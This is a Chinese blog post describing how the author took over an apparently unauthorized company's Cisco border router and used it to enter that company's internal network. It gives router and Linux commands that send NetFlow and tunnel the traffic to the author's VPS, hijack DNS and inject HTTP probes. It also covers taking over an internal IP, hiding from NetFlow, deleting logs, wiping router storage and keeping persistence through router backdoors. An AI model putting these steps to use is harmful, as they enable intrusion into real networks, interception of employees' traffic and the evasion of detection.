去年开始利用路由器对目标内网进行渗透的方式方法开始研究,测试了一阵了。看到乌云之前有一篇翻译外国人的文章,讲路由器流量劫持的,利用条件苛刻,成效也不大。所以决定写一篇自己实测的例子。

0x01 控制路由器


现在只搞cisco的路由器,但是方法不限于cisco,华为,juniper什么的都可以。

这一步没有什么好的办法,我们利用分布式扫描抓到了一些路由器,再加上其他的漏洞,有了一定数量作为测试保证。

选择一台 cisco c800系列的小企业路由器(很老了)

图1 router version

进去之后,先查看日志,登陆认证相关信息。

图 2 router 登陆等相关信息

有一个登陆限制的acl,被我之前删掉了,这就找到了telnet的密码。同时没有开启aaa认证,也就不存在什么认证服务器什么的,就只有本地验证。没有任何日志服务器的配置,连snmp都没有配置(本来还想留一个snmp的后门,看来是不行了)。

赶紧添加账号密码,加固路由器,修复漏洞。

图3 添加特权账户

0x02 网络拓扑分析


基本操作完,赶紧保留一份完整的配置(这个不能完整的贴出来)然后分析基本网络架构。

总述就是这是一个公司的小分部,通过pppoe加nat上网,有一个公网ip地址,有一个10.xx.xx.0/24的内网地址,通过gre的隧道,和主公司相连,拥有更为庞大的内网。

这种网络形式是最为常见的,通过ISP拨号获取公网地址,然后内网机器通过nat上网。全公网ip地址的公司网络极为少见。

网络拓扑如下

图4 网络拓扑示意图

0x03 准备进入内网


内网机器通过NAT访问Google,同时内网受到NAT的保护。我们控制了R1这台路由器,处于内网出口;还有一台公网VPS,ubuntu12.04 。R2表示很多台路由器,没有控制权限。

由于想要进行内网渗透测试,需要获取更多的信息。我们另外添加一台公网VPS(win2008R)在上面架设流量监视服务器,分析内网日常流量和行为。

win2008搭建的是netflow服务器,在R1上配置netflow,来观测内网流量信息。netflow软件网上有好多,solarwind最好,支持sqlserver2005,能存储大量的数据,没找到破解版。我用的ManageEngine,到处都是破解版。

netflow配置:

ip flow-export so int e 0
ip flow-ex dst 1.1.1.1 8888
ip flow-ex ver 5
……

流量分析比较直观,公司日常工作流量都是通过GRE Tunnel到达主网络,日常流量以http和https为主,而且通过流量统计可以看出来,他们的dns绝大多数都是Google public dns,占了所有dns流量的90%以上。

图6 目标网络流量总览图

图7 流量分类示意图

统计出来的web流量,尝试去打开这些网页,我都打不开,都是提示404 Not Found或者就是证书错误。这样看不见到底访问的是什么网站,Google也都没有搜索记录,就只能勉强看一下bing的同站,结果记录还是特别少。

为了摸清这个内网更为详细的信息(公司叫什么名字,员工经常登陆什么网站,常用软件是什么),就只能先劫持一下DNS了。由于网络环境比较恶略,有个NAT使得网络复杂太多。所以不选择使用透明劫持方式,选择用网关劫持方式。

做一下名词解释:

透明劫持方式:自定义名词,即不修改数据包的源IP地址和目的IP地址,只对数据包的data和checksum进行修改。这样基本不会让用户和服务器引起任何察觉,做到完全透明,同时无法被杀软防火墙IPS之类的发觉,除了增加一些延迟。

网关劫持方式:顾名思义,就是作为一个网关,对经过我的流量进行路由和NAT,使得流量能够正常在Internet上传输。会产生较大的影响,以Gmail为例,会提示异地登陆等。

关于劫持有一条准侧(我总结的):在有防火墙或者NAT的环境中劫持流量,你在哪把数据包接走,必须得把数据包(被劫持的数据包或者该数据包的回包)送回到那里。

这里做一下解释,在NAT上网的环境中做GRE通道的流量劫持,会很麻烦。出方向数据包通过路径为先进入GRE Tunnel,然后作为一个GRE 数据包通过NAT,也就是NAT只对GRE数据包生效,并且记录下状态,不会对被包含在GRE 中的数据包进行NAT,所以入方向,无法通过NAT。 这样的解释适用于防火墙。

因为编程能力有限等考虑,决定使用网关劫持模式。

在R1的连接公网的端口和我的Linux eth0 建立GRE Tunnel

Linux IP 地址:1.1.1.1

路由器公网IP地址:2.2.2.2

R1的配置

en
conf t
int tunnel 1
tunnel so e0(接口名称,也可以使用接口IP地址,但是会出问题)
tunnel dest 1.1.1.1
ip add 12.1.1.1 255.255.255.252
end

linux Ubuntu 配置: 建立GRE Tunnel

#modprobe ip_gre
#lsmode | grep    

#ip tunnel add gre1 mode gre  remote 2.2.2.2 local 1.1.1.1 ttl 255
#ip link set gre1 up
#ip addr add 12.1.1.2 peer 12.1.1.1 dev gre1

在Tunnel的两端都PING一下对端的IP地址,应该都是通的。

然后开启路由转发

将 /proc/sys/net/ip_forward 的数值修改为 1 (本次有效,重启后失效)

修改 /etc/sysctl.conf 文件,让包转发在系统启动时生效

net.ipv4.ip_forward = 1 前面的#号去掉

开启Iptables 的NAT

#iptables -t nat -A POSTROUTING -s 192.168.1.0/25 -j SNAT —to-source 202.103.224.58 

192的地址为需要做NAT的地址,202地址为已有公网IP地址,配置单词生效,重启后失效。

保存iptables 的规则 。

#service iptables save

添加内网路由

route add -net 10.0.0.0/8 gre1 

通往10.0.0.0这个八位的网络全部走gre1这个出口,即全部走GRE隧道。

然后利用我们自己开发的软件获取DNS数据内容 ,内容不方便贴出。

劫持了几天dns,看他们上了几天网之后,对内网有了个更为清楚的认识。进一步对HTTP数据包进行修改,加了个探针。探明之后再准备加入EXP获取内网权限,结果都是chrome,就放弃了。探针信息不方便贴出。

流量中还有telnet,ssh这类的流量,但是不能劫持,目的地址做了acl的限制,我的Linux不能访问,直接refuse。

0x04 进入内网


流量不能帮我获取内网权限,就只能自己进入内网。

强制劫持一个内网没有人用的合法IP地址,通过连接linux openVPN分配给自己,剩下只要在路由器添加这个地址的主机路由和在Linux上添加到10.xx.xx.xx/8 的默认路由,然后我的WorkStation就获得了内网访问权限(没有像VPN什么的限制,访问权限等同于路由器权限)。

如何让自己的WorkStation进入内网就是很随意的了,方法实在是太多,因为此时这台Ubuntu已经在内网中。openVPN配置和添加路由配置就不贴出了,网上太多。

图8 验证Ubuntu于内网的连通性

这样的内网渗透是有以下几个优点:

  1. 你所有的流量会被内网流量设备认为是内网流量,流量稍微大一点的内网,你可以随意下载文件,不用再关心流量过大引起报警。(理论,没脱过文件)
  2. 在路由器上做好隐藏,规避netflow监测,去掉日志,在临走的时候直接erease所有的存储器,你的行为在内网不可查。(理论,没做过)
  3. 如果地址劫持的合适,能绕过内网服务器的登陆限制(三层限制)。
  4. 时间把握的好,可以制造内网某员工从文件服务器大量下载文件的假象。(理论,没做过)

缺点

就一个,数据包不加密,这点很烦人,数据包基本全透明。要是路由器外没有安全设备了或者直接做一个IPSec Tunnel,就等同于没缺点。

总结,就是拥有极高的隐蔽性,远高于VPN,马什么的。连日志服务器都可以不怎么理他。

本文标题为迈入内网,并非内网渗透,不做内网渗透相关研究。

所有的敏感的信息已经修改涂掉。

0x05 后话


其他的一些小讨论

关于链路延迟,研究比较多,需要多说一点。以我劫持的Google为例,我在Google与内网路径的附近,并且是靠近Google的一端。

到Google的延迟平均为0.617ms

图9 Ubuntu 到Google延迟

路由器到Linux的延迟平均为256ms,路由器直接ping Google 平均延迟时180ms

图10 路由器网络延迟截图

Linux处理劫持数据,修改数据包的软件延迟约为5ms,所以预估劫持之后的延迟应该在260ms左右。

但是,经过劫持之后,到目标的延迟为248,该数值小于256ms+0.6ms+5ms,至于为什么,无法解释。

总体延迟影响,增加了180ms的三分之一,60ms左右。

之前我们对延迟有过较多的讨论:增加了延迟的三分之一,影响会比较明显,容易被察觉从而引发报警。我个人认为,大家上百度比平时延迟增加了500ms,或是1s,就算是baidu的运维,在检查完IP地址,看完tracert之后,也就骂骂运营商。更何况一般网络用户不会认为是运营商的问题,只会认为是不是自己电脑卡了,可能有人怀疑自己被网络劫持了么。

关于内网路由器的讨论,本文研究的路由器为网络边界路由器,至少有一个公网IP地址。当路由器或者三层交换处于内网中,劫持能否使用,答案是可以的。通过建立七层应用层隧道(GRE为三层网络层隧道),就像我们个人电脑一样,穿过内网。或者直接同内网的一台服务器建立连接,劫持数据(经过验证,但是公网测试时,对端是一台公网CISCO路由器2911,没试过服务器,开发能力有限)。

如果需要穿透内网,需要应用层VPN,例如IPSec VPN,EZ VPN (我测试了这俩,其他的高于三层的VPN都理论可行)等,配置比GRE Tunnel复杂的多,但懂了原理配置还是很简单的。配置实在是贴不完。IP Sec VPN理论上应该可以向IP Sec VPN 服务器建立连接,我没成功,还在理论层面研究。EZ VPN ,CISCO专有,肯定不能在WIN或者linux上搭建服务器。

关于驻留,通过路由器扩展内网驻留或者路由器后门驻留,比马什么的好太多了,除了NSA和fireeye,没听说过谁接触过过路由器后门的。国内绝对是通杀,会配置路由器的都没几个人,更别说反查。

关于HTTPS的讨论:绿标这个问题确实比较头疼,我目前尝试能过的就是嵌套,在绿标中插入红标,最后用户看到的还是绿标。

关于流量劫持软件,网上都说劫持软件多如牛毛,但是实际上找下来,就没有一个可以拿来直接用的,尤其是在透明劫持这个模式下,没发现能直接用的,像什么MITMproxy什么什么的,大家都说好,实际测试一下,也就适合开发人员调试软件,所以只能自己开发,但是开发能力有限。

希望大家推荐一些,能效率很高的处理大流量(例如BGP劫持)的软件。

您的支持将鼓励我们继续创作!

[微信] 扫描二维码打赏

[支付宝] 扫描二维码打赏